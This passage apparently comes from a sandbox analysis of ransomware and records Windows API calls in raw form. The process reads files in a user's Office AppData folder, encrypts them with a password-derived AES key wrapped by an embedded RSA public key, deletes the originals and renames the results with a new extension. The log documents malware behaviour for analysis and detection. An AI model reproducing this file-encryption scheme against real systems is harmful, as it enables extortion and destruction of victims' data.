pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.458] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.458] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.458] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.458] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.458] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.458] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.458] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.458] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.458] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.458] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.458] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.458] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.458] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.458] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.459] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.459] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.459] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.459] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.459] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.459] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.459] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.459] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.459] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.459] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.459] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.459] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.459] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.459] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.460] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.460] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.460] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.460] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.460] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.460] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.460] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x113, lpOverlapped=0x0) returned 1 [0269.460] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x113, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x120) returned 1 [0269.460] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x120, lpOverlapped=0x0) returned 1 [0269.460] CloseHandle (hObject=0x5d3c) returned 1 [0269.460] CloseHandle (hObject=0x5d48) returned 1 [0269.460] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup.exe_rules.xml"), bFailIfExists=0) returned 1 [0269.465] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0269.465] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup.exe_rules.xml.gsg")) returned 1 [0269.467] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup.exe_rules.xml.fuck")) returned 1 [0269.469] CryptDestroyHash (hHash=0x2fa288) returned 1 [0269.469] CryptDestroyKey (hKey=0x2fa948) returned 1 [0269.469] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0269.469] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0269.469] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0269.469] GetLastError () returned 0x0 [0269.469] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup64.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup64.exe_rules.xml")) returned 0x20 [0269.470] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup64.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0269.470] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup64.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup64.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0269.471] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup64.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\setup64.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0269.472] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\setup64.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0269.473] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0269.476] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0269.476] lstrlenA (lpString="yzLScEfviKODKVbxMUZoAxYXzMlQm") returned 29 [0269.476] CryptHashData (hHash=0x2fa488, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0269.476] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa488, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa748) returned 1 [0269.476] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0269.476] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0269.476] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f25bd0) returned 1 [0269.477] CryptImportPublicKeyInfo (in: hCryptProv=0x2f25bd0, dwCertEncodingType=0x1, pInfo=0x2f31250*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31280*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31288*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa808) returned 1 [0269.477] CryptEncrypt (in: hKey=0x2fa808, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0269.477] CryptEncrypt (in: hKey=0x2fa808, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f25d68*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f25d68*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0269.477] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f25d68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f25d68*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0269.485] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.487] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.488] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.499] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.499] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.500] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.500] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.500] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.500] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.500] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.501] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.501] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.501] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.501] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.501] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.502] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.502] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.502] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.502] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 